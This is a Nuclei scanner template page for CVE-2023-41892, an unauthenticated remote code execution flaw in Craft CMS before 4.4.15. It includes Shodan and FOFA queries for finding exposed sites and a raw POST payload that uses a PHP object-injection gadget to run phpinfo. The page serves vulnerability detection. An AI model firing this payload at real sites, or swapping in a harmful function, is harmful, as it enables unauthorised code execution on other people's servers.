Skip to content

CraftCMS < 4.4.15 - Unauthenticated Remote Code Execution

ID: CVE-2023-41892

Severity: critical

Author: iamnoooob,rootxharsh,pdresearch

Tags: cve2023,cve,rce,unauth,craftcms

Craft CMS is a platform for creating digital experiences. This is a high-impact, low-complexity attack vector leading to Remote Code Execution (RCE). Users running Craft installations before 4.4.15 are encouraged to update to at least that version to mitigate the issue. This issue has been fixed in Craft CMS 4.4.15.

id: CVE-2023-41892
info:
name: CraftCMS < 4.4.15 - Unauthenticated Remote Code Execution
author: iamnoooob,rootxharsh,pdresearch
severity: critical
description: Craft CMS is a platform for creating digital experiences. This is a high-impact, low-complexity attack vector leading to Remote Code Execution (RCE). Users running Craft installations before 4.4.15 are encouraged to update to at least that version to mitigate the issue. This issue has been fixed in Craft CMS 4.4.15.
impact: |
Successful exploitation of this vulnerability could allow an attacker to execute arbitrary code on the target system.
reference:
- https://github.com/craftcms/cms/security/advisories/GHSA-4w8r-3xrw-v25g
- https://blog.calif.io/p/craftcms-rce
- https://github.com/craftcms/cms/blob/develop/CHANGELOG.md#4415---2023-07-03-critical
- https://github.com/craftcms/cms/commit/7359d18d46389ffac86c2af1e0cd59e37c298857
- https://github.com/craftcms/cms/commit/a270b928f3d34ad3bd953b81c304424edd57355e
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8
cve-id: CVE-2023-41892
cwe-id: CWE-94
epss-score: 0.8421
epss-percentile: 0.98494
cpe: cpe:2.3:a:craftcms:craft_cms:*:*:*:*:*:*:*:*
metadata:
verified: true
max-request: 1
vendor: craftcms
product: craft_cms
shodan-query:
- http.favicon.hash:-47932290
- cpe:"cpe:2.3:a:craftcms:craft_cms"
- http.html:craftcms
fofa-query:
- icon_hash=-47932290
- body=craftcms
publicwww-query: "craftcms"
tags: cve2023,cve,rce,unauth,craftcms
http:
- raw:
- |
POST /index.php HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
action=conditions/render&test[userCondition]=craft\elements\conditions\users\UserCondition&config={"name":"test[userCondition]","as xyz":{"class":"\\GuzzleHttp\\Psr7\\FnStream", "__construct()": [{"close":null}],"_fn_close":"phpinfo"}}
matchers:
- type: word
words:
- "PHP Credits"
- "PHP Group"
- "CraftCMS"
condition: and
case-insensitive: true
# digest: 4a0a00473045022100990084590d007bee1a5308dd9545d094faf5f892244e96b86fc48de152090b660220400fb4cf424239d24ce5c187c136490269abb8185887c7369cacd5f7b36f23db:922c64590222798bb761d5b6d8e72950

This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.

Terminal window
$ nuclei -u "URL" -t "http/cves/2023/CVE-2023-41892.yaml"

View on Github